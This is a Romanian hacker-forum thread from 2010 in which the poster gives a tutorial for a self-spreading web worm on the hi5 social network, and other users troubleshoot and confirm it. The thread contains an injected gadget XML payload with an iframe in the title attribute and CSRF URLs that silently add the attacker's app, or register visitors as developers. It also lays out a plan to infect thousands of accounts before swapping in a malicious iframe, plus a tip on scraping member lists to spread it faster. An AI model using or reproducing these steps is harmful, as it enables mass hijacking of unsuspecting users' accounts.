Hi5 worm for noobs [stealth method]

[Guest Nemessis]

Cred ca asta e cel mai simplu tutorial de pe fata pamantului cand vorbim de un web worm.

UPDATED

SETUP

Urmati pasii de aici: http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst

Folosind live http headers din firefox salvati url-ul ce adauga aplicatia pe profilul vostru cand apasati butonul Add to my profile.

PROPAGAREA

Modificati in casuta de edit

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Sample App" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>

cu

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="[i]<iframe src=http://tinyurl.com/codredirect>[/i]" author_email="pulea@binkmail.com" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>

Unde scrie tinyurl.com adaugati linkul catre aplicatia voastra pe care l-ati aflat folosind live http headers.

Linkul aplicatiei arata cam asa http://hi5.com/friend/apps/addApp.do?referrer=&privacy=1&privacy=2&privacy=3&privacy=4&privacy=5&appId=44444&appContext=1. Va trebui sa il modificati pentru ca in locul "appId=44444" sa fie id-ul aplicatiei voastre. Adaugam linkul in image tag pentru ca este un csrf penibil si executa comanda respectiva fara ca cineva sa devina suspicios.

Ori de cate ori va viziteaza Gheorgita profilul (adica cineva care este logat pe contul de hi5), va adauga fara sa stie aplicatia voastra pe profilul lui. Cei care ii viziteaza profilul lui Gheorghita la randul lor isi vor adauga fara sa stie aplicatia voastra pe contul lor. Si tot asa se imprastie singura aplicatia pe conturile vizitatorilor hi5.

ATACUL

Dupa ce s-au infectat mii de persoane (dureaza cateva zile doar), dati din nou edit la aplicatia voastre si adaugati iframe-ul din imaginea de mai jos dupa modelul tutorialului prezentat aici => http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst.

In iframe nu uitati sa puneti linkul vostru in locul celui catre epicfail.ro. Deasemeni cititi cu atentie si primul tutorial pentru a nu da rateuri la setup.

E de preferat metoda din tutorialul meu fata de un atac direct cu iframe si injectarea aplicatiilor in conturile utilizatorilor, pentru ca veti afecta mii de conturi in acelasi timp fara ca cei de la hi5 sa aiba timp sa filtreze input-urile in timp rapid.

Enjoy!

[BAStuson]

interesant ... am sa incerc si eu

[Church]

am incercat eu dar imi da eroare

There was a problem with your XML (nulloak1app130-null-125e0b665d9 stream:3: expected `;' at `=')

cred ca am reusit pana la urma

am "encryptat" pe http://ha.ckers.org/xss.html si vad ca merge.. thnx

Edited January 4, 2010 by Church

[trxtxx]

mai merge ? am incercat si eu de pe 3 conturi diferite si nu mi-a adaugat aplicatia pe ele

imi dadea ca aplicatia inca nu a fost aprobata ceva de genu

[Church]

pai prima data adauga o aplicatie la misto... fa una test si asteapta sa fie aprobata . apoi editeaz-o. ..

peace

[Guest Nemessis]

mai merge ? am incercat si eu de pe 3 conturi diferite si nu mi-a adaugat aplicatia pe ele

imi dadea ca aplicatia inca nu a fost aprobata ceva de genu

Trebuie neaparat sa ii dai add pe profilul tau atunci cand e sample original. Adica din clipa in care ai vazut pentru prima data pagina asta dai click pe butonul asta. De-abia dupa aceea incepi sa modifici la ea.

[c0x]

1. Trebuie facut encode in sursa la url de la img ca sa se salveze aplicatia.

2. Doar tu, ca develeper al aplicatiei poti sa o vezi pe profilul tau, altii nu o pot vedea. => FIXED !

[Guest Nemessis]

hi5 | Your Friends. Your World. => intra logat cu ce user vrei tu. Merge perfect fara encode dar nu respectati voi pasii.

L.E. - adaugati acel img src intr-un camp de la about me. Vad ca intra-adevar da rateuri la editare.

[trxtxx]

fa o poza de preferabil cum ai tu acolo exact, daca la tine a mers sigur trebe sa mearga si la restul, si la about me unde il ai...pt ca nu reusesc sa il editez fara encodare. in cat timp aplicatia o sa fie valida sa o vada si altii ? aia de test macar cu hello world

[Guest Nemessis]

Imediat pun un fix simplu

Gata. Tinyurl ftw.

[trxtxx]

am observat update-ul facut. am intrat pe contu ala ce ai zis tu a aparut javascriptul cu eroarea 1, m-am uitat in sursa e ok trebuie sa mearga, dar poti sa faci de test sa vedem daca imi adauga aplicatia ta la mine pe cont ?

la mine nu am reusit sa imi activeze astia aplicatia sa o vad de pe alte conturi si am tot luat de la capat. mai fac odata cum ai zis tu dau direct acolo la sample ii dau add to my profile si dupa ma apuc sa pun iar iframe src=google.com sa vedem daca e vizibil si de alte conturi

[Guest Nemessis]

Merge acum. Intra iar pe contul meu si o sa-ti apara aplicatia Mi Inglés pe contul tau.

[trxtxx]

da am observat ca mi-a aparut la mine, ce ai scris in tinyurl.com/pulamea1 ? care e linkul de l-ai pus acolo ?

[Guest Nemessis]

Scrie in tutorial.

[trxtxx]

da mi-a mers si mie multumesc:)

[Church]

mie numa nu imi aproba aplicatia... futa-i dracu )

[Guest Nemessis]

Pentru ca ai modificat-o inainte de a-i da add pe profil. Fa alt profil.

[Church]

aha merci neme fac o palinca de bihor curand:)

le: tot nu imi aproba aplicatia .. fmm de jegosi

Edited January 4, 2010 by Church

[smeltz]

Ce vrea sa insemnea asta:

org.apache.shindig.common.xml.XmlException: The value of attribute "title" associated with an element type "ModulePrefs" must not contain the '<' character. At: (3,21)

Apare tot timpul jos(dar si in casuta cu applications),dupa ce am dat edit.

Presupun ca am am adaugat acel caracter undeva < si creaza probleme. am scris asa:

<ModulePrefs title="<iframe src=http://tinyurl.com/CONT>" author_email="EMAIL@yahoo.com" />

PS:Bravo nemessis pentru treaba facuta

[Guest Nemessis]

Merge cand apare eroarea aia. Go for it.

[trxtxx]

a mers dar aplicatia nu a fost validata, se poate viziona de pe alte conturi, dar daca adaug alt ID de aplicatie validata merge, dar daca il adaug pe al meu care nu a fost inca validat NU merge. o sa imi bat capul cumva sa vad cum sa fac daca nu iar il stresez pe nemesis

[loki]

o faza: daca vreti sa o raspanditi cat mai repede aveti aici lista tuturor membrilor hi5:

hi5 | Your Friends. Your World. (care incep cu litera A, de acolo luati toate literele).

Exemplu: hi5 | Your Friends. Your World. contine link-uri spre profile, se pot extrage si salva intr-un text. Apoi se modifica folosind replace all in iframe src. Apoi se incarca in browser si apari ca vizitator la userii din lista. Mai multi useri, mai multe sanse de castig.

[Guest Nemessis]

New fix: Doar developerii pot folosi aplicatiile care nu sunt trimise la hi5 asa ca mai intai victima trebuie sa acceseze linkul

http://hi5.com/friend/apps/developer/register-submit.do?languages=java&languages=php&languages=python&languages=ruby&languages=other&devtype=personal&organization=&purpose=blahblah&tos=on&submitting=Register

In casuta de editare a aplicatiei injectati un iframe catre o pagina care sa execute si respectivul link. O sa revin cu un fisier care face totul cap coada.

[trxtxx]

Nemesis the god of HI5 ori te angajeaza aia la iei sa ii repari ori iti dau bani sa ii repari eu unu sunt fan HI5 deabi astept sa reusesc cu tot...ca am cateva pitzipoance care o sa planga daca nu isi mai vad pozele acolo .

edit: da intai sa execute linkul care ii face developeri si dupa sa execute iframe-ul cu aplicatia noastra asa o sa mearga si dupa sa se infecteze toti in acelasi mod...sa execute prima oara developer si dupa iframe acela care ai zis la inceputul acestui tutorial pt ca a mers si la mine pana la urma doar cu o aplicatie aprobata de hi5..

astept cu nerabdare si tutorialul cu treaba asta

Edited January 5, 2010 by trxtxx

[Android324]

it's aliivvvvvveeeeeeee!!!!!!!!!...thx